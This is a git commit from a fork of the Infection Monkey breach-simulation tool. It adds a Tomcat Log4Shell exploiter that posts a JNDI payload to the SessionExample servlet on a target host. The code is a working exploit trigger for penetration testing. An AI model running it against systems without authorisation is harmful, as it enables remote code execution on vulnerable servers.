forked from p15670423/monkey
Agent: Add Apache Tomcat support for Log4Shell exploit
This commit is contained in:
parent
0006112e79
commit
79d92afcd4
|
@ -3,7 +3,8 @@ from typing import List
|
|||
from .exploitable_service import IExploitableService
|
||||
from .poc_docker import DockerPOCExploit
|
||||
from .solr import SolrExploit
|
||||
from .tomcat import TomcatExploit
|
||||
|
||||
|
||||
def get_log4shell_service_exploiters() -> List[IExploitableService]:
|
||||
return [DockerPOCExploit(), SolrExploit()]
|
||||
return [DockerPOCExploit(), SolrExploit(), TomcatExploit()]
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
from logging import getLogger
|
||||
|
||||
import requests
|
||||
|
||||
from infection_monkey.exploit.log4shell_utils.service_exploiters import IExploitableService
|
||||
from infection_monkey.model import VictimHost
|
||||
|
||||
logger = getLogger(__name__)
|
||||
|
||||
|
||||
class TomcatExploit(IExploitableService):
|
||||
service_name = "Apache Tomcat"
|
||||
|
||||
@staticmethod
|
||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
|
||||
payload = {"dataname": "foo", "datavalue": payload}
|
||||
try:
|
||||
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
Loading…
Reference in New Issue